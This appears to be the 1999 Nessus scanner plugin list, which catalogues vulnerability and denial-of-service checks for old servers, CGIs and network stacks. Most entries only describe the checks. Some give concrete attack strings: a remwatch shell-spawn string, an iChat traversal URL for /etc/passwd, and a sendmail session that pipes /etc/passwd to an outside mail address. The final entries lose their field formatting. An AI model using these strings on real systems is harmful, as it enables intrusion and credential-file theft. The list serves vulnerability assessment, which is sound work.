The Nessus Plugin List



Last update : Wed Feb 10 01:00:00 CET 1999


Each entry lists : Category, Name, Summary, Description, Copyright

Category : Denial of Service
Name : Microsoft Personal Web Server
Summary : performs a denial of service against MS Personal Web Server
Description : It is possible to crash Microsoft Personal Web Server by sending it a string which is too long. The MacOS 8.5.1 web sharing is affected too.
Risk factor : medium/high
Copyright : discovered by Gurney Halleck

Category : Attack
Name : phf
Summary : determines the presence of the 'phf' cgi
Description : The 'phf' cgi allows a remote user to execute any command on the target system with the same privileges as the web server.
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : Sendmail EXPN
Summary : sendmail EXPN and VRFY exploit
Description : Sendmail should not allow a remote user to perform EXPN or VRFY commands, since they can give away some interesting information. This plugin determines if the remote sendmail allows those commands.
Risk factor : low
Copyright : no copyright

Category : Attack
Name : campas
Summary : determines the presence of the 'campas' cgi
Description : The 'campas' cgi allows a remote user to view any file on the local system, with the privileges of the http daemon (root or nobody). This plugin determines if this cgi is installed on the remote host and tries to read a file (specified in the daemon preferences) on the remote server.
Risk factor : medium/high
Copyright : no copyright

Category : Information gathering
Name : finger features
Summary : determines if fingerd sends the list of the unused accounts of the remote system
Description : This plugin determines whether there is a hole in the fingerd daemon of a remote host, allowing a remote user to obtain the list of the users who have never logged in to the remote system. This is of some interest to a darkside hacker, who may then know which accounts are never used and try to force them, since they are not monitored.
Risk factor : medium/high
Copyright : no copyright

Category : Attack
Name : glimpse
Summary : determines the presence of the 'glimpse' cgi
Description : This plugin determines whether the 'glimpse' cgi is installed. This cgi allows a remote user to execute any command on the server.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : handler
Summary : determines the presence of the bug of the 'handler' cgi
Description : This plugin determines whether a bug of the 'handler' cgi is present on a remote host. This bug allows a remote user to execute any command on the server.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : htmlscript
Summary : determines the presence of the 'htmlscript' cgi
Description : This plugin determines whether the 'htmlscript' cgi is installed. This cgi allows a remote user to view any file on a given host.
Risk factor : medium/high
Copyright : no copyright

Category : Information gathering
Name : icat
Summary : determines the presence of the 'icat' cgi
Description : This plugin determines the presence of the 'icat' cgi. Some versions of this cgi allow a remote user to view any file on a WindowsNT system.
Risk factor : medium/high
Copyright : no copyright

Category : Information gathering
Name : imap buffer overflow
Summary : imap buffer overflow
Description : There is a bug in some versions of Imap which allows a remote user to become root using a buffer overflow. This plugin determines if the remote imap is subject to this attack.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : in.fingerd '|command@host' bug
Summary : determines if in.fingerd is exploitable
Description : Some versions of in.fingerd allow a remote user to execute arbitrary commands on a remote host. This plugin tries to execute '/bin/id'.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : inn buffer overflow
Summary : determines if inn is vulnerable
Description : This plugin determines whether inn is vulnerable. Some old versions of inn may be exploited using a remote buffer overflow.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : Sendmail standard vulnerabilities tester
Summary : gets information about sendmail
Description : A lot of security holes have been found in sendmail.
Copyright : no copyright

Category : Attack
Name : php
Summary : determines the presence of the 'php' cgi
Description : The 'php' cgi allows a remote user to read any file on the target system with the same privileges as the web server.
Risk factor : High
Copyright : no copyright

Category : Attack
Name : remwatch
Summary : remwatch exploit (hpux)
Description : Some versions of the 'remwatch' daemon may spawn a shell with root privileges if the string '11T ;/bin/ksh' is entered.
Risk factor : High
Copyright : no copyright

Category : Denial of Service
Name : land
Summary : denial of service using the 'land' attack
Description : Some implementations of TCP/IP are vulnerable to packets that are crafted in a particular way (a SYN packet in which the source address and port are the same as the destination, i.e. spoofed). This plugin tries to crash a remote host using this attack.
Risk factor : high
Copyright : M3lt, FLC

Category : Attack
Name : ftp writeable root
Summary : attempts to write on the root of a remote ftp server
Description : It is sometimes possible to write on the root directory of a remote ftp server, which is a real problem since any hacker can upload a '.forward' or '.rhosts' file and then get a shell easily.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : webdist
Summary : determines the presence of the 'webdist' cgi
Description : Determination of the presence of the 'webdist' cgi
Copyright : no copyright

Category : Attack
Name : webgais
Summary : determines the presence of the 'webgais' cgi
Description : Determination of the presence of the 'webgais' cgi
Copyright : no copyright

Category : Attack
Name : websendmail
Summary : determines the presence of the 'websendmail' cgi
Description : Determination of the presence of the 'websendmail' cgi
Copyright : no copyright

Category : Denial of Service
Name : Livingston PortMaster crash
Summary : crashes a Livingston PortMaster
Description : It is possible to crash a remote Livingston PortMaster by overflowing its buffers.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : pfdispaly
Summary : determines the presence of the 'pfdispaly' cgi
Description : The 'pfdispaly' cgi allows a remote user to read any file on the remote workstation.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : Standard System holes
Summary : underlines little holes of a newly installed system
Description : Underlines little holes of a newly installed system. Most newly installed systems have some 'standard' ports open that are of no use to anyone except intruders.
Copyright : no copyright

Category : Denial of Service
Name : NT RAS PPTP
Summary : WindowsNT DoS
Copyright : Kevin Wormington

Category : Denial of Service
Name : mdaemon
Summary : buffer overflow for MDaemon SMTP server
Description : It is possible to crash a remote MDaemon SMTP server by sending it a string which is too long. Once it has crashed, MDaemon must be restarted by hand, and the workstation cannot receive mail.
Risk factor : medium/high
Copyright : no copyright

Category : Denial of Service
Name : pnserver DoS
Summary : attempts to crash PN Real Video Server
Description : It is possible to crash some versions of the Progressive Networks Real Video Server by sending it some garbage.
Risk Factor : Medium
Copyright : no copyright

Category : Attack
Name : EWS (Excite for Web Servers) CGI hole
Summary : determines the presence of the 'phf' cgi
Description : An EWS cgi allows a remote user to execute any command on the target system with the same privileges as the web server.
Risk factor : High
Copyright : found by Marc Merlin

Category : Attack
Name : BIND buffer overrun
Summary : determines if BIND can be attacked by a buffer overflow
Description : BIND 4.9 releases prior to BIND 4.9.7 and BIND 8 releases prior to 8.1.2 do not properly bounds check a memory copy when responding to an inverse query request. An improperly or maliciously formatted inverse query on a TCP stream can crash the server or allow an attacker to gain root privileges. This plugin determines if your BIND daemon can be affected by such an attack without actually gaining root access.
Risk factor : high
Copyright : Original code by Joshua J. Drake (jdrake@pulsar.net)

Category : Denial of Service
Name : slmail
Summary : buffer overflow for the SLMail SMTP server
Description : SLMail SMTP server for WindowsNT buffer overflow exploit
Copyright : no copyright

Category : Attack
Name : php-cgi buffer overflow
Summary : overflows the buffer of the remote 'php' cgi
Description : Some versions of the 'php' cgi can be overflowed, thus allowing a remote user to execute arbitrary commands on the remote host. This plugin checks if the remote php can be attacked this way.
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : wingate
Summary : notifies the user whether wingate is running
Description : This plugin notifies the user that wingate is installed on a remote machine.
Copyright : no copyright

Category : Attack
Name : info2www
Summary : determines the presence of the 'info2www' cgi
Description : This plugin determines whether the 'info2www' cgi is installed on a remote computer. This cgi allows a remote user to execute any command on a given server.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : search.**@host cfingerd feature
Summary : determines if cfingerd sends the list of users of the remote system
Description : There is a bug in the cfingerd daemon which allows a remote user to get the list of all the users of the vulnerable system. This information may be of some help to a darkside hacker.
Risk factor : medium-high
Copyright : no copyright

Category : Information gathering
Name : finger
Summary : determines the presence of the 'finger' cgi
Description : This plugin determines whether the 'finger' cgi is installed. This cgi may lead to a denial of service of a remote server and may give some interesting information to an intruder.
Risk factor : medium/high
Copyright : no copyright

Category : Information gathering
Name : test-cgi
Summary : determines the presence of the 'test-cgi' cgi
Description : Determination of the presence of the 'test-cgi' cgi
Copyright : no copyright

Category : Denial of Service
Name : recursive finger
Summary : denial of service using finger root@@@@(...)@host
Description : It is possible to cause a denial of service using the recursive finger method, which consists in sending to the remote host a finger request containing a lot of '@'.
Risk factor : Medium
Copyright : no copyright

Category : Denial of Service
Name : ircd killer
Summary : attempts to crash ircd
Description : This plugin tries to crash a remote ircd server by sending it a very long string.
Risk factor : medium
Copyright : original code by fx of nnh (aaron@ug.cs.dal.ca)

Category : Attack
Name : wu-ftpd 'site exec' bug
Summary : checks if the 'site exec' bug of wu-ftpd is present
Description : Some wu-ftpd daemons are subject to the 'site exec' bug, which allows a local user to gain root privileges. This plugin determines if the remote ftp server is subject to this bug.
Risk factor : medium (remotely) / high (locally)
Copyright : no copyright

Category : Information gathering
Name : NULL Linux ftp backdoor
Summary : checks if the user NULL backdoor is present on the remote ftpd
Description : There was a backdoor in the old ftp daemons of Linux which allowed a remote user to log in with the username 'NULL' and then have root privileges over FTP. This plugin determines if it is present on the remote host.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : Windows NT ftp 'guest' account
Summary : checks if there is a 'guest' account on the remote WindowsNT ftp server
Description : This plugin determines whether the 'guest' account of a remote WindowsNT box has been disabled.
Copyright : no copyright

Category : Denial of Service
Name : Serv-U 'CWD' denial of service
Summary : crashes a remote Serv-U FTP server
Description : This plugin attempts to crash a remote Serv-U FTP server by issuing a CWD command with a long directory name.
Risk factor : High/Medium
Copyright : no copyright

Category : Information gathering
Name : WFTP (Windows FTP server) login check
Summary : checks if WFTP accepts bogus logins
Description : This plugin determines whether the remote ftp daemon accepts connections with any username/password (i.e. an old version of WFTP).
Copyright : no copyright

Category : Attack
Name : ftp real path
Summary : attempts to get the real path to the remote ftp home
Description : It is possible to get the real path to the ftp home by issuing the 'CWD' command. This information may be of some interest to an intruder who knows where to put a '.rhosts' file.
Risk factor : low
Copyright : no copyright

Category : Denial of Service
Name : teardrop
Summary : fragments overlap denial of service
Description : Some implementations of the TCP/IP IP fragmentation re-assembly code do not properly handle overlapping IP fragments. Teardrop is a widely available attack tool that exploits this vulnerability.
Risk factor : high
Copyright : Copyright (c) 1997 route|daemon9

Category : Denial of Service
Name : sping
Summary : denial of service using the ping of death
Description : Cert Advisory CA-96.26 : The TCP/IP specification (the basis for many protocols used on the Internet) allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and 0 or more octets of optional information, with the rest of the packet being data. It is known that some systems will react in an unpredictable fashion when receiving oversized IP packets. Reports indicate a range of reactions including crashing, freezing, and rebooting.
In particular, the reports received by the CERT Coordination Center indicate that Internet Control Message Protocol (ICMP) packets issued via the "ping" command [...]. ICMP is a subset of the TCP/IP suite of protocols that transmits error and control messages between systems. Two specific instances of the ICMP are the ICMP ECHO_REQUEST and ICMP ECHO_RESPONSE datagrams. These two instances can be used by a local host to determine whether a remote system is reachable via the network; this is commonly achieved using the "ping" command.
Discussion in public forums has centered around the use of the "ping" command to construct oversized ICMP datagrams (which are encapsulated within an IP packet). Many ping implementations by default send ICMP datagrams consisting only of the 8 octets of ICMP header information but allow the user to specify a larger packet size if desired.
You can read more information about this vulnerability on Mike Bremford's Web page. (Note that this is not a CERT/CC maintained page. We provide the URL here for your convenience.)
http://www.sophist.demon.co.uk/ping/index.html
Copyright : Jeff W. Roberson

Category : Attack
Name : nfs world export
Summary : checks if a host exports a filesystem to anyone
Description : Some servers export any file to anybody, which is usually not a good thing to do.
Risk factor : high
Copyright : no copyright

Category : Denial of Service
Name : ascend kill
Summary : reboots an ascend router
Description : It is possible to reboot an ascend router by sending it a specially constructed UDP packet on the discard port (9).
Risk factor : high
Copyright : rootshell

Category : Denial of Service
Name : winnuke
Summary : Windows denial of service using OOB msg on port 139
Description : This plugin sends an out-of-band message to port 139 of a Windows95 machine and attempts to crash it.
Copyright : no copyright

Category : Information gathering
Name : Count.cgi (wwwcount)
Summary : determines the presence of the 'Count.cgi' (wwwcount)
Description : The 'count.cgi' cgi is subject to a bug which allows a remote user to execute arbitrary commands on the attacked host.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : X11-Checker
Summary : determines if there is an X11 server with disabled access control on the remote system
Description : Checks if there is an open X11 server.
Risk factor : high
Copyright : Sebastian Schreiber, GPL

Category : Denial of Service
Name : nestea
Summary : 'off by one IP header' bug
Description : nestea is a variation of the teardrop attack which makes Linux kernels die.
Risk factor : high
Copyright : Copyright (c) 4/16/98 humble of rhino9

Category : Denial of Service
Name : sunkill
Summary : performs a denial of service against a Solaris Workstation
Description : This plugin performs a denial of service against a Solaris Workstation by flooding it with ^D while negotiating a telnet session.
Copyright : discovered by Jason Zapman II

Category : Denial of Service
Name : Oracle Webserver denial of service
Summary : overflows the buffer of the remote ows
Description : Version 2.1 of Oracle Webserver can be led to a denial of service if it is sent a string argument which is too long.
Risk factor : Medium
Copyright : no copyright

Category : Information gathering
Name : nph-test-cgi
Summary : determines the presence of the 'nph-test-cgi' cgi
Description : Determination of the presence of the 'nph-test-cgi' cgi
Copyright : no copyright

Category : Denial of Service
Name : WINS udp flood
Summary : WINS denial of service
Description : Some WINS servers do not like to be flooded with UDP packets, and give up and stop their service.
Risk factor : High
Copyright : adapted from Holas, Ondřej

Category : Information gathering
Name : Sendmail : 'debug' vulnerability tester
Summary : sendmail 'debug' exploit
Description : On very old implementations of sendmail, the 'debug' option allows a remote user to execute arbitrary commands as root.
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : Sendmail 'decode' vulnerability tester
Summary : sendmail 'decode' exploit
Description : If '/etc/aliases' contains "|/usr/bin/uudecode" as the 'decode' alias, anyone who can connect to the sendmail daemon can write to any file owned by daemon, or to any file owned by any user.
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : Sendmail overwrite feature
Summary : send a mail to a file
Description : Some versions of sendmail allow a remote user to send a mail directly to a non-root owned file. This feature can be used to overwrite a user's '.rhosts' file or whatever else...
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : Sendmail : mail from: <|program>
Summary : use a pipe to make sendmail execute a program
Description : Some versions of sendmail allow a remote user to use pipes in usernames, thus allowing him to execute remote commands as root. This exploit is very popular... A typical attack to get the password file is:
% telnet target.com 25
Trying 123.456.789.0...
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
mail from: "|/bin/mail me@myhost.com < /etc/passwd"
250 "|/bin/mail me@myhost.com < /etc/passwd"
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "."
.
250 Mail accepted
quit
Connection closed by foreign host.
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : pop3 buffers overflows
Summary : pop3 buffers overflows
Description : There is a bug in some versions of pop3d which allows a remote user to become root using a buffer overflow. This plugin determines if the remote pop3d is subject to this attack.
Risk factor : high
Copyright : no copyright

Category : Denial of Service
Name : IIS 'GET ../.. '
Summary : performs a denial of service against IIS
Description : It is possible to crash IIS by sending it the request 'GET ../..'
Risk factor : medium/high
Copyright : No copyright

Category : Denial of Service
Name : Bonk
Summary : another ip fragment denial of service
Description : Variation of Teardrop which crashes some Windows boxes
Copyright : bendi

Category : Attack
Name : Microsoft Frontpage exploits
Summary : plays with Microsoft Frontpage extensions
Description : Some Microsoft Frontpage extensions allow remote users to view any file on the system and to overwrite those files. If vulnerable, a site must quickly contact Microsoft for a patch.
Risk factor : High
Copyright : Written after a paper from pedward@WEBCOM.COM

Category : Denial of Service
Name : WindowsNT DNS QR denial
Summary : performs a denial of service against Windows NT DNS server
Description : The WindowsNT DNS service terminates abnormally when it receives an answer to a DNS query that was never made, so any remote user can cause a denial of service on the DNS server.
Risk factor : high
Copyright : No copyright

Category : Denial of Service
Name : WindowsNT DNS flood denial
Summary : performs a denial of service against Windows NT DNS server
Description : It is possible to crash some versions of the WindowsNT DNS server by sending it a flood of characters. The fix to this problem is in hotfixes-postSP3/dns-fix.
Risk factor : high
Copyright : No copyright

Category : Denial of Service
Name : Chameleon SMTPd overflow
Summary : buffer overflow for the Chameleon SMTP server
Description : Chameleon SMTPd does not properly check the bounds of some strings, and a remote user may force it to crash. This plugin only tests the 'HELP longtopic' exploit, although there are several other problems.
Copyright : problems found by Anton Rager arager@McGraw-Hill.com

Category : Information gathering
Name : in.ftpd PASS buffer overflow
Summary : attempts to overflow a remote ftp server
Description : It is possible to overflow some in.ftpd daemons by sending a password which is too long. This may allow a remote intruder to execute arbitrary commands on the remote host.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : in.ftpd USER buffer overflow
Summary : attempts to overflow a remote ftp server
Description : It is possible to overflow some in.ftpd daemons by sending a username which is too long. This may allow a remote intruder to execute arbitrary commands on the remote host.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : Motorola Cable router vulnerability
Summary : Checks for a vulnerability in Motorola Cable modems
Description : It is sometimes possible to reconfigure a Motorola Cable router by connecting to it on port 1024 and using the right login/password (which is by default 'cablecom/router'). This plugin will attempt to connect to the remote host on port 1024 and will check whether this vulnerability is present.
Copyright : discovered by January

Category : Information gathering
Name : qpopper buffer overflow
Summary : qpopper buffer overflow
Description : There is a bug in some versions of qpopper which allows a remote user to become root using a buffer overflow. This plugin determines if the remote qpopper is subject to this attack.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : lpd is active
Summary : notifies the user that lpd is available
Description : Some badly configured line printer daemons (lpd) allow anyone to use the printer they are in charge of. This may allow an attacker to cause denials of service by filling the printer queue, or to waste paper and ink.
Risk factor : medium
Copyright : no copyright

Category : Denial of Service
Name : BNC overflow
Summary : overflows a buffer in a remote BNC server
Description : Some older versions of BNC servers are vulnerable to a buffer overflow which may give an attacker a shell running as the BNC uid. BNC servers are usually used as IRC proxies. This plugin attempts to connect on ports 9000 and 6666-6669 and sends an argument which is too long to the USER command. However, be warned that this plugin may be ineffective, since BNC can be run on any port.
Risk factor : Medium/High
Copyright : found by SDI http://www.sekure.org

Category : Attack
Name : MetaInfo servers
Summary : Read everything using '../../' in the URL
Description : Several versions of MetaInfo servers allow remote users to read files they are not allowed to, by entering '../../' in the URL. Platform affected : WindowsNT
Risk factor : High
Copyright : discovered by Jeff Forristal

Category : Information gathering
Name : SSH Insertion attack
Summary : checks the version of the SSH protocol used on a remote machine
Description : Older versions of the SSH protocol are vulnerable to an 'insertion attack'. This means that an attacker with access to the encrypted SSH stream may insert encrypted blocks in the stream that will decrypt to arbitrary commands to be executed on the SSH server.
Risk factor : High
Copyright : Discovered by CORE SDI S.A

Category : Attack
Name : ftp cwd ~root
Summary : attempts to log in as root
Description : There is a bug in older versions of some FTP servers which would allow anonymous logins to be logged in as root. This plugin tries to see if this vulnerability is present on the remote ftp server.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : default system accounts
Summary : telnet to the remote host and guess login/passwords
Description : Several operating systems come with default accounts that have no or simple passwords. This plugin will attempt to connect to the remote host on the telnet port and will attempt to find those weak accounts.
Copyright : no copyright

Category : Attack
Name : WebSite 1.0 buffer overflow
Summary : executes some code on a remote host running WebSite 1.0
Description : There is a buffer overflow in some WebSite 1.0 CGI scripts which allows a remote intruder to execute any command on the remote host. Platform affected : WindowsNT
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : dumpenv
Summary : checks for the 'dumpenv' CGI
Description : The dumpenv CGI is a cgi-script which is part of the Sambar server. It can give away information that does not need to be known to the public.
Risk factor : Low/Medium
Copyright : no copyright

Category : Attack
Name : uploader.exe problem
Summary : uploads a file on the remote WebSite server
Description : O'Reilly's webserver 'website' contains a demo package that contains the cgi-program uploader.exe. It is possible to use it to upload CGI-programs on the remote WebServer, thus allowing an intruder to execute arbitrary commands remotely. Platforms affected : WindowsNT, Windows95
Risk factor : High
Copyright : found by Herman de Vette

Category : Denial of Service
Name : wingate DoS
Summary : performs a denial of service against a wingate server
Description : Unsecured Wingates happily connect to themselves. When they run out of buffers, they prevent anyone from using them. Platform affected : Windows
Risk factor : Medium
Copyright : found by Matt Carothers

Category : Denial of Service
Name : Annex
Summary : crashes an Annex terminal server
Description : It is possible to crash an Annex terminal server by sending an argument which is too long to the 'ping' CGI.
Risk factor : High
Copyright : found by the Redes2 Security Team

Category : Information gathering
Name : wu_imapd buffer overflow
Summary : wu-imapd buffer overflow
Description : CERT Advisory CA-98.09 - imapd : The CERT Coordination Center has received reports regarding a buffer overflow in some implementations of IMAP servers. The overflow is in library code from the University of Washington IMAP server that handles SASL server-level authentication. This vulnerability is different from the one discussed in CERT Advisory CA-97.09.imap_pop. Information about this vulnerability has been posted to various public mailing lists and newsgroups.
All versions of the University of Washington IMAP server prior to the final (frozen, non-beta) version of imap-4.1 that support SASL server-level authentication are vulnerable. The vulnerability affects all University of Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable.
Additionally, the vulnerability is present in other IMAP servers that use library code from the University of Washington IMAP server to handle SASL server-level authentication.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : faxsurvey
Summary : determines the presence of the 'faxsurvey' cgi
Description : There is a bug in the 'faxsurvey' CGI-Script which allows an attacker to execute any command he wants with the permissions of the HTTP-Server.
Risk factor : High
Copyright : found by Tom

Category : Attack
Name : thttpd
Summary : determines if the remote thttpd allows anyone to read anything
Description : Versions of the web server thttpd up to 2.03 (included) allow remote intruders to read any file the thttpd server has the right to read, especially /etc/passwd.
Risk factor : High
Copyright : hole found by Mark Slemko

Category : Attack
Name : iChat
Summary : determines if iChat is vulnerable to a stupid bug
Description : iChat servers up to version 3.00 allow any remote user to view any file on the target system by doing the following request : http://chat.server.com:4080/../../../etc/passwd
Risk factor : High
Copyright : no copyright

Category : Information gathering
Name : guess operating system
Summary : guesses the remote OS
Description : This plugin attempts to guess the type of the remote operating system by looking at the telnet and ftp banners.
Copyright : no copyright

Category : Attack
Name : ftp misc. overflows
Summary : attempts to find some buffer overflows on a remote ftp server
Description : Some FTP servers do not check the length of the arguments of several commands and are thus subject to potential buffer overflows. This plugin attempts to find which commands are subject to possible buffer overflows.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : statd
Summary : attempts to send a buffer overflow to statd
Description : There is a bug in some 'statd' that allows a remote user to become root. Also, it is possible to create and remove any file on the remote system using this service.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : Portmapper check
Description : The portmapper is the central program for RPC programs. If an attacker can connect to it, he can find which RPC services are running and can make a more accurate attack.
Risk factor : Medium
Copyright : no copyright

Category : Information gathering
Name : Sendmail HELO overflow
Summary : send anonymous mail
Description : Some versions of sendmail have a bug: mail sent by anybody who first sent a HELO string longer than about 1024 bytes will not carry the additional information that sendmail stamps on the mail header (such as the IP address of the user who mailed it, the username of who did it, and more), because the long HELO name crops this information.
Risk factor : low
Copyright : Javi Polo, GPL

Category : Information gathering
Name : firewall icmp check
Copyright : licensed under the GPL

Category : Attack
Name : view_source
Summary : determines the presence of the 'view-source' cgi
Description : The 'view_source' cgi, shipped with some httpd distributions, allows a remote user to view any file the httpd daemon has the right to read.
Risk factor : High
Copyright : no copyright

Category : Scanner
Name : Nmap tcp connect() scan
Copyright : Taken from Fyodor's Nmap

Category : Attack
Name : ftp bounce
Summary : checks if the remote ftp server can be bounced
Description : It is possible to force several FTP servers to connect to third-party hosts. This can be used by intruders to use your network resources to scan some other hosts, or it can be used to go through some firewalls.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : anonymous ftp enabled
Summary : checks if the remote ftp server accepts anonymous logins
Description : The 'ftp' service may allow anonymous logins. If the server admin decides to leave this service open to the whole world, he must configure it so that anonymous users cannot read everything on the server. It is usually not a good idea to leave an anonymous ftp server open with no real reason, since many FTP attacks require the intruder to log in...
Risk factor : high if the anonymous FTP is badly set up, low if it is well configured
Copyright : no copyright

Category : Attack
Name : cgi jj
Summary : determines the presence of the 'jj' cgi
Description : The 'jj' cgi allows a remote user to execute any command on the target system with the same privileges as the web server.
Risk factor : High
Copyright : no copyright

Category : Attack
Name : TFTP get file
Summary : Attempts to grab a file through tftp
Description : The TFTP (Trivial File Transfer Protocol) allows remote users to read files without having to log in. This may be a big security flaw, especially if tftpd (the TFTP server) is not well configured by the admin of the remote host.
Risk factor : high
Copyright : no copyright

Category : Attack
Name : ftp PASV denial of service
Summary : attempts to do a PASV dos
Description : Some FTP servers allow any user to issue any number of PASV commands, thus blocking the free ports for legitimate services. This plugin attempts to issue a given number of those commands.
Risk factor : medium
Copyright : no copyright

Category : Information gathering
Name : icmp broadcast check
Copyright : licensed under the GPL

Category : Attack
Name : ftp get /etc/passwd
Copyright : this plugin is distributed under the GPL

Category : Attack
Name : ftp writeable directories
Copyright : this plugin is distributed under the GPL

Category : Attack
Name : Tooltalk presence check
Description : CERT Advisory CA-98.11 : An implementation fault in the ToolTalk object database server allows a remote attacker to run arbitrary code as the superuser on hosts supporting the ToolTalk service. The affected program runs on many popular UNIX operating systems supporting CDE and some Open Windows installs.
Copyright : no copyright

Category : Information gathering
Name : r-commands check
Summary : checks the presence of the r-commands (rsh, rlogin...)
Description : Some people install a proxy which is supposed to act as a firewall and feel safe, even though they have not disabled the r-commands (rlogin, rsh...). This plugin checks that the r-services of a firewall-protected computer are unavailable.
Risk factor : high
Copyright : Licensed under the GPL

Category : Attack
Name : perl interpreter can be launched as a CGI
Summary : determines if the perl interpreter can be launched as a cgi
Description : Some badly configured web servers allow users to execute the perl interpreter, which is not a good thing, since it is like giving shell access to anyone. Removing the perl executable from the 'cgi-bin' directory solves this problem.
Risk factor : high
Copyright : no copyright

Category : Information gathering
Name : Sendmail supports EHLO
Summary : determines if the remote server supports the EHLO greeting
Description : The EHLO greeting tells sendmail to use ESMTP (Extended Simple Mail Transfer Protocol), which has additional vulnerabilities. Supporting it, and showing that sendmail supports it, may help an intruder to focus his efforts on a specific weakness.
Risk factor : medium
Copyright : distributed under the GPL

Category : Denial of Service
Name : + + + ATH0 modem hangup
Summary : makes a modem hang up
Description : Most modems today follow the Hayes Command set (ATZ, ATDT, ATH0...). Unfortunately the way that these modems handle certain strings leaves them susceptible to a specific type of DoS attack. By forcing the victim to respond with the string "+ + +ATH0", modems will interpret the + + +ATH0 as the user manually attempting to enter command mode and execute a command. Because of this, when the victim attempts to respond with the + + +ATH0, the modem sees it within the IP datagram and hangs up. It is also possible to make a remote modem hang up and then dial another number, forcing its owner to lose money.
Risk factor : medium
Copyright : made after the bugtraq article of Max Schau (Noc-Wage)

Category : Information gathering
Name : auth enabled
Summary : checks if auth is enabled
Description : The auth service provides sensitive information to intruders : it can be used to find out which accounts are running which servers. This may help attackers to focus on services that are worth hacking (those owned by root). If you do not use this service, disable it in /etc/inetd.conf.
Risk factor : medium
Copyright : distributed under the GPL

AttackNIS serverdetermines if the remote host is a NIS serverThe NIS service is mainly used to share password files among the hosts of a given network. These files must not be intercepted by the intruders. The first step of their attack is to find out whether the host they are attacking is a NIS server. This plugin will attempt to see if the remote host is a NIS server.
Risk factor : medium
distributed under the GPL
Attackmountd overflowdetermines if the remote mountd may be overflowedSome versions of mountd can be overflowed remotely, giving root access to anyone. This plugin will not determine if the remote host is vulnerable, but just warns the user if the remote mountd accepts a too long argument Warning: this plugin may crash your mount daemon
Risk factor: high
based on LucySoft [ luci@@transart.ro ] exploit
Denial of ServiceWingate POP3 USER overflowcrash WingateWingate can crash if a user telnet to port 110 (POP3) on a machine running Wingate and try to login as "USER x#9999[a lot of 9's]\Risk factor : highPaco Brufal, GPL
AttackProxy CONNECT checkchecks for badly configured proxiesSome misconfigured proxy accepts the CONNECT requests of their clients, which is a very bad thing since it can allow anyone to bypass a firewall and to use the proxy as a launch pad for attacking another site Risk factor : very highRenaud Deraison
Information gatheringdaytime checkdetermines if daytime is activatedThis plugin determines if the daytime service is running. Sometimes, the date format issued by this service can help an intruder to guess the operating system of the remote host. This service is potentially vulnerable to spoofing attacks which can link the daytime port to the echo port consuming network bandwidth. You should disable this service if you do not use it Risk factor : lowno copyright
AttackNetscape Server ?PageServices bugmake a request like http://foo.bar.edu/?PageServicesRequesting an URL with '?PageServices' at its end makes some Netscape servers dump the listing of the page directory, thus showing potentially sensitive files Risk factor : Medium/Highno copyright
AttackRemote gopher server can be used as a proxychecks for a bad gopherdMost gopher servers accepts to act as a FTP proxy. Thus, sending a request like : ftp:any.ftp.site.com@@/ to the remote gopher server will make it act as a proxy. This vulnerability can be used by attackers to bypass your firewall (if the gopher server is trusted by the firewall). In addition to that, your host may server as a launch pad to attack some other sites via FTP You should also note that gopherd offers poor logging options Risk factor : very highRenaud Deraison
Attack | Bootparamd presence check | | When a diskless client needs to boot, it uses the bootparam protocol to get the necessary information from the server. If bootparamd is running, one can guess which is the client and which is the server, or use a program such as bootparam_prot.x to determine which is which. If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get its NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap). Risk factor : High | no copyright
Attack | pcnfsd sends the users list | | | ga
Attack | NIS check domain | | This plugin attempts to guess the remote NIS domain name. To do so, it retrieves the index of the remote NIS maps of the target. If it is successful, it means that you have incorrectly chosen your NIS domain name, and this is a problem since it allows remote attackers to get your NIS maps easily -- especially your passwd map. Risk factor : High | code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik (casper@fwi.uva.nl).
Attack | pcnfsd sends the printers list | | | ga
Attack | Proxy POST check | checks for badly configured proxies which accept to redirect POST | Some misconfigured proxies accept requests like POST http://somehost:25. This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if the remote proxy accepts POST requests going anywhere. Risk factor : very high | Renaud Deraison
Attack | Proxy GET check | checks for badly configured proxies | Some misconfigured proxies accept requests asking for some non-WWW ports (ie: 25). This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if: a) the remote proxy accepts our requests (which may be a bad thing); b) the remote proxy accepts our requests on bogus ports. If the remote proxy accepts requests on bogus ports, this may allow an attacker to bypass a firewall. Risk factor : very high | Renaud Deraison
Attack | pcnfsd warning | | | no copyright
